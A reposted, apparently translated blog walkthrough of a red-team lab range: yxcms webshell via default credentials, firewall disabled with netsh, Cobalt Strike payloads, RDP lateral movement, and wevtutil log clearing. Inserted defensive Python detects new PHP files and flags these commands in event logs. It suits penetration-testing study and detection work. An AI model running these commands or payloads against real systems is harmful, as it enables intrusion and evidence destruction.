Red team attack and defense knowledge sharing - Red Sun security team shooting range 1 - Express version
2022-04-22 17:33:00 【beirry】
This express version follows the penetration flow used in day-to-day engagements; if you are still learning, it is suggested to study the first edition first.
In everyday engagements the servers usually have port 3389 (RDP) open, so here I first enable 3389 on all the hosts.
Internet Management
Port scanning

The port scan shows that the web site is open.
Directory scanning 
Directory scanning shows that the database in use is MySQL and that a backup file of the site is exposed.
Joining the paths found in the backup package gives the site URL http://192.168.54.128/yxcms; the CMS is yxcms, version 1.2.1.
Knowing it is yxcms, search Baidu directly for known vulnerabilities.
Visit the site's admin backend and try the default credentials admin / 123456.

From Baidu: the front-end template editing function can create a new php file, which gives a webshell directly.

To get the path, search the backup package for where the front-end template php files live, then join the pieces to obtain the URL: http://192.168.54.128/yxcms/protected/apps/default/view/default/info_search.php
Webshell connection
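The foothold above is a new php file dropped into the CMS template directory by the template editor. A simple defensive control for that is a baseline manifest of the web root: hash every php file once the site is known-good, then re-walk the tree and report anything added or modified. The following is an added example (not code from the original post or from yxcms); it builds the manifest with the standard library and uses a constructed temporary directory that mirrors the template path from the write-up.

```python
"""Detect newly added or modified PHP files under a CMS web root.

Added example, not part of the original write-up. Assumes a baseline
manifest (relative path -> sha256) was taken while the site was known-good.
The directory layout and file contents in demo() are constructed.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Return {relative_path: sha256} for every .php file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
    return manifest


def diff_manifest(baseline, current):
    """Compare two manifests; return (added, modified, removed) relative paths."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(
        p for p in current if p in baseline and current[p] != baseline[p]
    )
    return added, modified, removed


def demo():
    """Constructed scenario: take a baseline, then a new file appears in the
    template directory and an existing one is edited."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "protected", "apps", "default", "view", "default")
        os.makedirs(tpl)
        with open(os.path.join(tpl, "index.php"), "w") as f:
            f.write("<?php echo 'home'; ?>\n")
        baseline = build_manifest(root)

        # simulate a file created through the template editor (benign content)
        with open(os.path.join(tpl, "info_search.php"), "w") as f:
            f.write("<?php /* unexpected new template file */ ?>\n")
        # simulate an edit to an existing template
        with open(os.path.join(tpl, "index.php"), "a") as f:
            f.write("<!-- edited -->\n")

        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added)
    print("modified:", modified)
    print("removed:", removed)
```

In practice the baseline is stored off-host (an attacker with a webshell can rewrite a manifest that lives in the web root), and the diff runs from a scheduled job or a file-integrity agent rather than from the web server itself.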

Turn off firewall
NetSh Advfirewall set allprofiles state off // Turn off firewall

Post-exploitation
Bring the host online in CS

Grab the password

3389 login

Intranet information collection
Collect intranet information (being lazy here, I will not go over the collection method; if you want it, see [Intranet information collection]).
| Intranet IP network segment | 192.168.52.0/24 |
|---|---|
| Domain | GOD |
| Domain users | Administrator, ligang, liukaifeng01 |
| Domain hosts | OWA$ (192.168.52.138), ROOT-TVI862UBEH$ (192.168.52.141), STU1$ (this machine) |
| Domain controller | OWA$ |
| Domain administrator | administrator |
| 3389 | Open on all hosts |
Possible vulnerabilities:
| OWA$ (192.168.52.138) | ROOT-TVI862UBEH$ (192.168.52.141) |
|---|---|
| ms17-010 | ms17-010 |
| - | ms08-067 |
Lateral movement
Since we know the domain administrator is administrator, connect directly over 3389 to 192.168.52.138 and 192.168.52.141; the password is the same as the web server's.

Establish a reverse connection tunnel

For Listen Host, fill in the intranet IP of the controlled host, then click Save.

Generate the Trojan files

For Listener, select the reverse_tcp listener we just created.

Here we generate both a 64-bit and a 32-bit payload (138 is 64-bit and 141 is 32-bit), so two Trojan files are needed.
Place both files in the web site on the server we control, then have the target hosts visit http://192.168.52.143/[Trojan file name.exe] directly to download them.
138:

141:

Run the Trojan file
Back in CS, you can see that both hosts are now online.


Trace cleaning
wevtutil cl system // Clear the System log
wevtutil cl application // Clear the Application log
wevtutil cl security // Clear the Security log
I was lazy here and did not clear everything, but in a real engagement all of them should be cleared.
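Three of the steps in this walkthrough leave a recognisable footprint on the host: the firewall being switched off with netsh, the RDP logons used for lateral movement, and the wevtutil log clearing just above (clearing the Security log itself writes Security event 1102, and clearing other logs writes System event 104, so the cleanup is itself an indicator). Below is an added detection example, not code from the original post. It assumes process-creation auditing with command-line logging is enabled (Security event 4688) and that events have already been parsed into dicts; the field names (EventID, Channel, CommandLine, LogonType, ...) and the sample events are constructed for the demo.

```python
"""Flag the host-level tradecraft from this write-up in Windows event records:
firewall disabled via netsh, logs cleared via wevtutil, the resulting
'log cleared' events (Security 1102, System 104) and RDP logons (4624, type 10).

Added example, not from the original post. Event records are constructed
dicts shaped like parsed event-log output; field names are assumptions.
"""
import re

# Constructed sample events (STU1 is the web server, OWA the domain controller).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Channel": "Security", "Computer": "STU1",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    {"EventID": 4688, "Channel": "Security", "Computer": "STU1",
     "CommandLine": "notepad.exe report.txt"},
    {"EventID": 4688, "Channel": "Security", "Computer": "STU1",
     "CommandLine": "wevtutil cl security"},
    {"EventID": 1102, "Channel": "Security", "Computer": "STU1"},
    {"EventID": 104, "Channel": "System", "Computer": "STU1"},
    {"EventID": 4624, "Channel": "Security", "Computer": "OWA", "LogonType": 10,
     "IpAddress": "192.168.52.143", "TargetUserName": "administrator"},
]

# Command-line rules applied to process-creation events (4688).
# wevtutil accepts both "cl" and "clear-log"; netsh accepts any profile name.
CMDLINE_RULES = [
    ("firewall_disabled",
     re.compile(r"netsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("eventlog_cleared_cmd",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
]


def evaluate(event):
    """Return the list of rule names that match a single event."""
    hits = []
    eid = event.get("EventID")
    if eid == 4688:
        cmd = event.get("CommandLine", "")
        for name, rx in CMDLINE_RULES:
            if rx.search(cmd):
                hits.append(name)
    elif eid == 1102 and event.get("Channel") == "Security":
        hits.append("security_log_cleared")      # written by the Security log itself
    elif eid == 104 and event.get("Channel") == "System":
        hits.append("eventlog_cleared")          # System/Application log cleared
    elif eid == 4624 and event.get("LogonType") == 10:
        hits.append("rdp_logon")                 # RemoteInteractive = RDP
    return hits


def scan(events):
    """Run every event through the rules; return (computer, event id, rule) tuples."""
    return [(e.get("Computer"), e.get("EventID"), h)
            for e in events for h in evaluate(e)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The 1102/104 rules only work if the events are forwarded off the host before the log is cleared, which is why the usual mitigation for this section is central log forwarding rather than anything local; the 4688 command-line rules need "Include command line in process creation events" enabled in audit policy, otherwise the CommandLine field is empty and only the log-cleared events remain.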

Because this is the express version, many places have been simplified, for example enabling 3389 directly. Treat it as light reading; if there is any mistake in the content, please point it out by private message or in the comments.
Copyright notice
This article was written by [beirry]; when reposting, please include the original link. Thanks.
https://yzsam.com/2022/04/202204221728588196.html